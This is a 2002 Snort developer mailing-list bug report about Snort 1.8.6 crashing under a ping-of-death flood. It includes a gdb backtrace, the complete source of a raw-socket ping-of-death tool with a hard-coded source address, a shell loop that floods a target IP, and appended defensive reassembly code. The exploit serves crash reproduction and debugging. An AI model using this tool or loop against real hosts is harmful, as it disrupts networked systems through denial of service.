[Snort-devel] snort 1.8.6 core dump when receive lot of ping of the death

axel.letourneur at ...1289... axel.letourneur at ...1289...
Thu Apr 25 06:40:03 EDT 2002



I use a program named ping-of-death1.c on another host on another network with
this shell command:

while [ 1 -eq 1 ]; do ./ping-of-death1 X.X.X.X ; usleep 1; done

where X.X.X.X is the IP address of the Snort detector (I didn't try with the broadcast
address of the Snort detector ...).
After less than 1 minute Snort core dumps. The two machines have good network
connectivity between them.



System architecture: x86 (in Makefile i586-pc-linux-gnu)
Operating system: Red Hat Linux 7.0 with kernel 2.2.16-22
Command line switches used: ./snort -c ./rules/snort.conf -l log/ -D
I just uncommented "var HOME_NET $eth0_ADDRESS"
and commented out "var HOME_NET any".
I have only one interface, eth0, and a loopback, lo.
I haven't got any Snort error messages, but I have a core dump file.

Core file analysed with gdb:


GNU gdb 5.0
Copyright 2000 Free Software Foundation, Inc.
GDB is free software, covered by the GNU General Public License, and you are
welcome to change it and/or distribute copies of it under certain conditions.
Type "show copying" to see the conditions.
There is absolutely no warranty for GDB.  Type "show warranty" for details.
This GDB was configured as "i386-redhat-linux"...
Core was generated by `./snort -c ./rules/snort.conf -l log/ -D'.
Program terminated with signal 11, Segmentation fault.
Reading symbols from /lib/libm.so.6...done.
Loaded symbols for /lib/libm.so.6
Reading symbols from /lib/libnsl.so.1...done.
Loaded symbols for /lib/libnsl.so.1
Reading symbols from /lib/libc.so.6...done.
Loaded symbols for /lib/libc.so.6
Reading symbols from /lib/ld-linux.so.2...done.
Loaded symbols for /lib/ld-linux.so.2
Reading symbols from /lib/libnss_files.so.2...done.
Loaded symbols for /lib/libnss_files.so.2
Reading symbols from /lib/libnss_nisplus.so.2...done.
Loaded symbols for /lib/libnss_nisplus.so.2
Reading symbols from /lib/libnss_nis.so.2...done.
Loaded symbols for /lib/libnss_nis.so.2
#0  ubi_btTraverse (RootPtr=0x48, EachNode=0x807b680 <RebuildTraverse>,
    UserData=0x80cc4fa) at ubi_BinTree.c:1006
1006      ubi_btNodePtr p = ubi_btFirst( RootPtr->root );
(gdb) bt
#0  ubi_btTraverse (RootPtr=0x48, EachNode=0x807b680 <RebuildTraverse>,
    UserData=0x80cc4fa) at ubi_BinTree.c:1006
#1  0x807c18f in RebuildFrag (ft=0x84c92f0, p=0xbffff470) at spp_frag2.c:739
#2  0x807bbd2 in Frag2Defrag (p=0xbffff470) at spp_frag2.c:494
#3  0x80573de in Preprocess (p=0xbffff470) at rules.c:3545
#4  0x804a784 in ProcessPacket (user=0x0, pkthdr=0xbffff930, pkt=0x80caa42 "")
    at snort.c:548
#5  0x807cd5e in pcap_read ()
#6  0x807d32f in pcap_loop ()
#7  0x804bf9d in InterfaceThread (arg=0x0) at snort.c:1681
#8  0x804a2ec in main (argc=6, argv=0xbffffac4) at snort.c:478
#9  0x4006e790 in __libc_start_main (main=0x8049f50 <main>, argc=6,
    ubp_av=0xbffffac4, init=0x80496a4 <_init>, fini=0x808422c <_fini>,
    rtld_fini=0x4000d35c <_dl_fini>, stack_end=0xbffffabc)
    at ../sysdeps/generic/libc-start.c:111
(gdb)




The source of the ping of death program I use is named ping-of-death1.c:

/*
 * win95ping.c
 *
 * Simulate the evil win95 "ping -l 65510 buggyhost".
 * version 1.0 Bill Fenner <fenner at ...144...> 22-Oct-1996
 * version 1.01 Mike Bremford <Mike.Bremford at ...1290...> patched for Linux
 * version 1.02 Barak Pearlmutter <bap at ...1291...> clean compile
 *
 * This requires raw sockets that don't mess with the packet at all (other
 * than adding the checksum).  That means that SunOS, Solaris, and
 * BSD4.3-based systems are out.  BSD4.4 systems (FreeBSD, NetBSD,
 * OpenBSD, BSDI) will work.  Linux might work, I don't have a Linux
 * system to try it on.
 *
 * The attack from the Win95 box looks like:
 * 17:26:11.013622 cslwin95 > arkroyal: icmp: echo request (frag 6144:1480 at ...475...+)
 * 17:26:11.015079 cslwin95 > arkroyal: (frag 6144:1480 at ...575...+)
 * 17:26:11.016637 cslwin95 > arkroyal: (frag 6144:1480 at ...1292...+)
 * 17:26:11.017577 cslwin95 > arkroyal: (frag 6144:1480 at ...1293...+)
 * 17:26:11.018833 cslwin95 > arkroyal: (frag 6144:1480 at ...1294...+)
 * 17:26:11.020112 cslwin95 > arkroyal: (frag 6144:1480 at ...1295...+)
 * 17:26:11.021346 cslwin95 > arkroyal: (frag 6144:1480 at ...1296...+)
 * 17:26:11.022641 cslwin95 > arkroyal: (frag 6144:1480 at ...1297...+)
 * 17:26:11.023869 cslwin95 > arkroyal: (frag 6144:1480 at ...1298...+)
 * 17:26:11.025140 cslwin95 > arkroyal: (frag 6144:1480 at ...1299...+)
 * 17:26:11.026604 cslwin95 > arkroyal: (frag 6144:1480 at ...1300...+)
 * 17:26:11.027628 cslwin95 > arkroyal: (frag 6144:1480 at ...1301...+)
 * 17:26:11.028871 cslwin95 > arkroyal: (frag 6144:1480 at ...1302...+)
 * 17:26:11.030100 cslwin95 > arkroyal: (frag 6144:1480 at ...1303...+)
 * 17:26:11.031307 cslwin95 > arkroyal: (frag 6144:1480 at ...1304...+)
 * 17:26:11.032542 cslwin95 > arkroyal: (frag 6144:1480 at ...1305...+)
 * 17:26:11.033774 cslwin95 > arkroyal: (frag 6144:1480 at ...1306...+)
 * 17:26:11.035018 cslwin95 > arkroyal: (frag 6144:1480 at ...1307...+)
 * 17:26:11.036576 cslwin95 > arkroyal: (frag 6144:1480 at ...1308...+)
 * 17:26:11.037464 cslwin95 > arkroyal: (frag 6144:1480 at ...1309...+)
 * 17:26:11.038696 cslwin95 > arkroyal: (frag 6144:1480 at ...1310...+)
 * 17:26:11.039966 cslwin95 > arkroyal: (frag 6144:1480 at ...1311...+)
 * 17:26:11.041218 cslwin95 > arkroyal: (frag 6144:1480 at ...1312...+)
 * 17:26:11.042579 cslwin95 > arkroyal: (frag 6144:1480 at ...1313...+)
 * 17:26:11.043807 cslwin95 > arkroyal: (frag 6144:1480 at ...1314...+)
 * 17:26:11.046276 cslwin95 > arkroyal: (frag 6144:1480 at ...1315...+)
 * 17:26:11.047236 cslwin95 > arkroyal: (frag 6144:1480 at ...1316...+)
 * 17:26:11.048478 cslwin95 > arkroyal: (frag 6144:1480 at ...1317...+)
 * 17:26:11.049698 cslwin95 > arkroyal: (frag 6144:1480 at ...1318...+)
 * 17:26:11.050929 cslwin95 > arkroyal: (frag 6144:1480 at ...1319...+)
 * 17:26:11.052164 cslwin95 > arkroyal: (frag 6144:1480 at ...1320...+)
 * 17:26:11.053398 cslwin95 > arkroyal: (frag 6144:1480 at ...1321...+)
 * 17:26:11.054685 cslwin95 > arkroyal: (frag 6144:1480 at ...1322...+)
 * 17:26:11.056347 cslwin95 > arkroyal: (frag 6144:1480 at ...1323...+)
 * 17:26:11.057313 cslwin95 > arkroyal: (frag 6144:1480 at ...1324...+)
 * 17:26:11.058357 cslwin95 > arkroyal: (frag 6144:1480 at ...1325...+)
 * 17:26:11.059588 cslwin95 > arkroyal: (frag 6144:1480 at ...1326...+)
 * 17:26:11.060787 cslwin95 > arkroyal: (frag 6144:1480 at ...1327...+)
 * 17:26:11.062023 cslwin95 > arkroyal: (frag 6144:1480 at ...1328...+)
 * 17:26:11.063247 cslwin95 > arkroyal: (frag 6144:1480 at ...1329...+)
 * 17:26:11.064479 cslwin95 > arkroyal: (frag 6144:1480 at ...1330...+)
 * 17:26:11.066252 cslwin95 > arkroyal: (frag 6144:1480 at ...1331...+)
 * 17:26:11.066957 cslwin95 > arkroyal: (frag 6144:1480 at ...1332...+)
 * 17:26:11.068220 cslwin95 > arkroyal: (frag 6144:1480 at ...1333...+)
 * 17:26:11.069107 cslwin95 > arkroyal: (frag 6144:398 at ...1334...)
 *
 */
#define LINUX

#ifdef LINUX
#define REALLY_RAW
#define __BSD_SOURCE
#ifndef IP_MF
#define IP_MF           0x2000
#define IP_DF           0x4000
#define IP_CE           0x8000
#define IP_OFFSET       0x1FFF
#endif
#endif

#include <stdio.h>
#include <stdlib.h>             /* exit() */
#include <string.h>
#include <strings.h>            /* bzero(), bcopy() */
#include <sys/types.h>
#include <sys/socket.h>
#include <netdb.h>
#include <netinet/in.h>
#include <netinet/in_systm.h>
#include <netinet/ip.h>
#include <netinet/ip_icmp.h>
#include <arpa/inet.h>
/*
 * If your kernel doesn't muck with raw packets, #define REALLY_RAW.
 * This is probably only Linux.
 */
#ifdef REALLY_RAW
#define FIX(x)  htons(x)
#else
#define FIX(x)  (x)
#endif


int
main(int argc, char **argv)
{
        int s;
        char buf[1500];
        struct ip *ip = (struct ip *)buf;
#ifdef LINUX
        struct icmphdr *icmp = (struct icmphdr *)(ip + 1);
#else
        struct icmp *icmp = (struct icmp *)(ip + 1);
#endif
        struct hostent *hp;
        struct sockaddr_in dst;
        int offset;
        int on = 1;

        bzero(buf, sizeof buf);

        if ((s = socket(AF_INET, SOCK_RAW,
#ifdef LINUX
       IPPROTO_ICMP
#else
        IPPROTO_IP
#endif
        )) < 0) {
                perror("socket");
                exit(1);
        }
        if (setsockopt(s, IPPROTO_IP, IP_HDRINCL, &on, sizeof(on)) < 0) {
                perror("IP_HDRINCL");
                exit(1);
        }
        if (argc != 2) {
                fprintf(stderr, "usage: %s hostname\n", argv[0]);
                exit(1);
        }
        if ((hp = gethostbyname(argv[1])) == NULL) {
                if ((ip->ip_dst.s_addr = inet_addr(argv[1])) == -1) {
                        fprintf(stderr, "%s: unknown host\n", argv[1]);
                        exit(1);
                }
        } else {
                bcopy(hp->h_addr_list[0], &ip->ip_dst.s_addr, hp->h_length);
        }
        printf("Sending to %s\n", inet_ntoa(ip->ip_dst));
        ip->ip_v = 4;
        ip->ip_hl = sizeof *ip >> 2;
        ip->ip_tos = 0;
        ip->ip_len = FIX(sizeof buf);
        ip->ip_id = htons(4321);
        ip->ip_off = FIX(0);
        ip->ip_ttl = 255;
        ip->ip_p = 1;
        ip->ip_sum = 0;                 /* kernel fills in */
        /* Source address is hard-coded here; a value of 0 would let the
         * kernel fill it in. */
        ip->ip_src.s_addr = inet_addr("194.214.201.66");

        memset(&dst, 0, sizeof dst);    /* zero sin_port and padding */
        dst.sin_addr = ip->ip_dst;
        dst.sin_family = AF_INET;

#ifdef LINUX
        icmp->type = ICMP_ECHO;
        icmp->code = 0;
        icmp->checksum = htons(~(ICMP_ECHO << 8));
                /* the checksum of all 0's is easy to compute */
#else
        icmp->icmp_type = ICMP_ECHO;
        icmp->icmp_code = 0;
        icmp->icmp_cksum = htons(~(ICMP_ECHO << 8));
                /* the checksum of all 0's is easy to compute */
#endif

        /* Emit 1480-byte payload fragments. The final one carries 398 bytes
         * at offset 65120, so the reassembled datagram is 65518 bytes of ICMP
         * plus the 20-byte IP header: 65538, above the 65535-byte IP maximum. */
        for (offset = 0; offset < 65536; offset += (sizeof buf - sizeof *ip)) {
                ip->ip_off = FIX(offset >> 3);
                if (offset < 65120)
                        ip->ip_off |= FIX(IP_MF);
                else
                        ip->ip_len = FIX(418);  /* make total 65538 */
                if (sendto(s, buf, sizeof buf, 0, (struct sockaddr *)&dst,
                                        sizeof dst) < 0) {
                        fprintf(stderr, "offset %d: ", offset);
                        perror("sendto");
                }
                /* Only the first fragment carries the ICMP echo header;
                 * every later fragment is sent with an all-zero payload. */
                if (offset == 0) {
#ifdef LINUX
                        icmp->type = 0;
                        icmp->code = 0;
                        icmp->checksum = 0;
#else
                        icmp->icmp_type = 0;
                        icmp->icmp_code = 0;
                        icmp->icmp_cksum = 0;
#endif
                }
        }
        return 0;
}


Thanks if you can help me.
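The backtrace above dies inside the frag2 preprocessor while rebuilding a datagram from fragments whose combined length exceeds what an IP datagram can hold. The following is an added example, not part of the original post and not Snort's own reassembly code: a minimal IPv4 fragment tracker that checks `offset + length` against the 65515-byte payload limit (65535 minus a 20-byte header) before storing anything, rejects inconsistent "last" fragments, and poisons the tracker once an oversize fragment is seen so nothing later traverses corrupted state. The fragment sizes it replays (44 fragments of 1480 bytes, then 398 bytes at offset 65120) are constructed to mirror the program above; the IP ID 4321, the payload contents and the function names are assumptions made for this example.

```c
/*
 * Added example (not from the original post and not Snort code): a minimal
 * IPv4 fragment tracker that enforces the datagram size limit before it
 * touches per-datagram state. Fragment offsets/lengths are constructed to
 * mirror the ping-of-death sequence; the IP ID and payload are assumed.
 */
#include <stdint.h>
#include <stdio.h>
#include <string.h>

#define IP_MAXPACKET 65535u
#define IPHDR_LEN    20u
#define MAX_PAYLOAD  (IP_MAXPACKET - IPHDR_LEN)   /* 65515: largest legal payload */

enum frag_status {
    FRAG_ACCEPTED = 0,        /* stored, datagram still incomplete */
    FRAG_COMPLETE = 1,        /* stored, every byte is now present */
    FRAG_REJECT_OVERSIZE = 2, /* offset + len would exceed MAX_PAYLOAD */
    FRAG_REJECT_BAD = 3       /* inconsistent with fragments seen before */
};

struct frag {
    uint16_t ip_id;
    uint32_t offset;  /* byte offset: (ip_off & IP_OFFSET) * 8 */
    int      more;    /* IP_MF flag */
    uint32_t len;     /* payload bytes carried by this fragment */
};

struct frag_tracker {
    uint16_t ip_id;
    int      active;                     /* cleared once the tracker is poisoned */
    uint32_t bytes_seen;
    uint32_t total_len;                  /* 0 until the MF=0 fragment arrives */
    uint8_t  data[MAX_PAYLOAD];
    uint8_t  seen[MAX_PAYLOAD / 8 + 1];  /* one bit per payload byte */
};

void frag_tracker_init(struct frag_tracker *t, uint16_t ip_id)
{
    memset(t, 0, sizeof *t);
    t->ip_id = ip_id;
    t->active = 1;
}

enum frag_status frag_insert(struct frag_tracker *t, const struct frag *f,
                             const uint8_t *payload)
{
    if (!t->active || f->ip_id != t->ip_id || f->len == 0)
        return FRAG_REJECT_BAD;
    if (f->more && (f->len % 8) != 0)   /* non-final fragments are 8-byte multiples */
        return FRAG_REJECT_BAD;

    uint64_t end = (uint64_t)f->offset + f->len;   /* 64-bit: the add cannot wrap */
    if (end > MAX_PAYLOAD) {
        t->active = 0;                  /* poison: accept nothing more for this ID */
        return FRAG_REJECT_OVERSIZE;
    }
    if (!f->more) {
        if (t->total_len != 0 && t->total_len != end)
            return FRAG_REJECT_BAD;     /* two different "last" fragments */
        t->total_len = (uint32_t)end;
    } else if (t->total_len != 0 && end > t->total_len) {
        return FRAG_REJECT_BAD;         /* data beyond the announced end */
    }

    memcpy(t->data + f->offset, payload, f->len);   /* safe: end <= MAX_PAYLOAD */
    for (uint32_t i = f->offset; i < end; i++) {
        uint8_t bit = (uint8_t)(1u << (i % 8));
        if (!(t->seen[i / 8] & bit)) {
            t->seen[i / 8] |= bit;
            t->bytes_seen++;
        }
    }
    return (t->total_len != 0 && t->bytes_seen == t->total_len)
           ? FRAG_COMPLETE : FRAG_ACCEPTED;
}

/* Replays the pattern the posted program emits: 44 fragments of 1480 payload
 * bytes with MF set, then a final 398-byte fragment at offset 65120. Returns
 * the status of the fragment that stopped the replay; its index goes to
 * *stopped_at when that pointer is non-null. */
enum frag_status replay_ping_of_death(int *stopped_at)
{
    static struct frag_tracker t;     /* ~74 KB, kept off the stack */
    static uint8_t payload[1480];     /* constructed all-zero payload */
    frag_tracker_init(&t, 4321);
    enum frag_status st = FRAG_ACCEPTED;
    int i = 0;
    for (uint32_t off = 0; off < 65536; off += 1480, i++) {
        struct frag f = { 4321, off, off < 65120, off < 65120 ? 1480 : 398 };
        st = frag_insert(&t, &f, payload);
        if (st != FRAG_ACCEPTED)
            break;
    }
    if (stopped_at)
        *stopped_at = i;
    return st;
}

int ping_of_death_stop_index(void)
{
    int i = -1;
    replay_ping_of_death(&i);
    return i;
}

/* A well-formed three-fragment datagram delivered out of order, for contrast. */
enum frag_status replay_legit(void)
{
    static struct frag_tracker t;
    static uint8_t payload[1480];
    frag_tracker_init(&t, 7);
    struct frag a = { 7, 0, 1, 1480 }, b = { 7, 1480, 1, 1480 }, c = { 7, 2960, 0, 100 };
    enum frag_status st = frag_insert(&t, &c, payload);   /* last fragment first */
    if (st != FRAG_ACCEPTED)
        return st;
    st = frag_insert(&t, &a, payload);
    if (st != FRAG_ACCEPTED)
        return st;
    return frag_insert(&t, &b, payload);
}

int main(void)
{
    int idx;
    enum frag_status st = replay_ping_of_death(&idx);
    printf("ping-of-death replay: status %d at fragment %d\n", st, idx);
    printf("legit datagram: status %d\n", replay_legit());
    return 0;
}
```

The 44 full-size fragments all pass (the one at offset 63640 ends exactly at 65120), and the 45th is refused because 65120 + 398 = 65518 is past the 65515-byte payload ceiling; the tracker is then marked inactive so a later retransmission cannot revive it. The point for a reassembler is that the size check happens before any buffer write or tree walk, and that a failed check leaves the per-datagram state in a shape that is still safe to visit.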
